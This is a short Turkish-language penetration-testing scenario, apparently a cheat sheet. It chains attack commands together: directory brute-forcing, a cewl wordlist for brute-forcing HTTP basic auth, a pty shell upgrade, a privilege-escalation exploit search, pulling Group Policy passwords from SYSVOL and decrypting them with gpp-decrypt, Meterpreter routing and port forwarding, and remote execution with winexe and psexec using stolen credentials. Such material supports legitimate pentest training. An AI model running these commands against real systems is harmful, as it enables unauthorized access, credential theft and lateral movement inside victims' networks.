Örnek Bir Senaryo

Senayo 1:

Hedef web uygulamasına dirbuster başlat. (wordlist: /usr/share/dirbuster/wordlist/directory-list-1.0.txt)

HTTP basic auth mekanizmasına brute-force saldırısı yap. Bu işlem için cewl aracını kullan.

cewl domain.com -m 6 -w /root/file.txt 2 > /dev/null

hash-identifier aracını kullanılan hash algoritmasını öğrenmek için kullanılabilir.

Kullanılan web uygulamasına ait exploit googledan araştırılır.

python -c 'import pty; pty.spawn("/bin/bash")' EXPORT TERM=linux

OS info; cat /etc/issue

Priv. esc. için googledan exploit aratılır. (gimmeroot.c)

Root olduktan sonra .htaccess dosyasından izin verilen ip adresleri öğrenilir.

post/windows/gather/enum_domain domain adı ve DC adına ait bilgileri getirir. Aşağıdaki komut DC'de bulunan grup policy dosyasını bulmak için kullanılır. Grup policy dosyasında kullanıcıya ait parola bilgisi yer alabilir. net use z: \MACHINE_IP\SYSVOL

Grup policy dosyasında bulunan parola gpp-decrypt aracı kullanılarak kırılabilir.

Port Forwarding ve Routing Meterpreter

Meterpreter oturumu elde edilen makine üzerinde meterpreter backgrounda alındıktan sonra aşağıdaki komut yardımıyla route kuralı tanımlanır.

msf > route add TARGET SUBNET METERPRETER_SESSION

Meterpreter oturumu elde edilen makinenin 445 portuna gelen trafiği "X.X.X.X" ip adresinin 445 portuna yönlendir.

meterpreter > portfwd add -l 445 -p 445 -r X.X.X.X

winexe

# winexe -U Administrator%Password //IP "cmd"
# psexec.py ./eviluser:Password@IP cmd

Last updated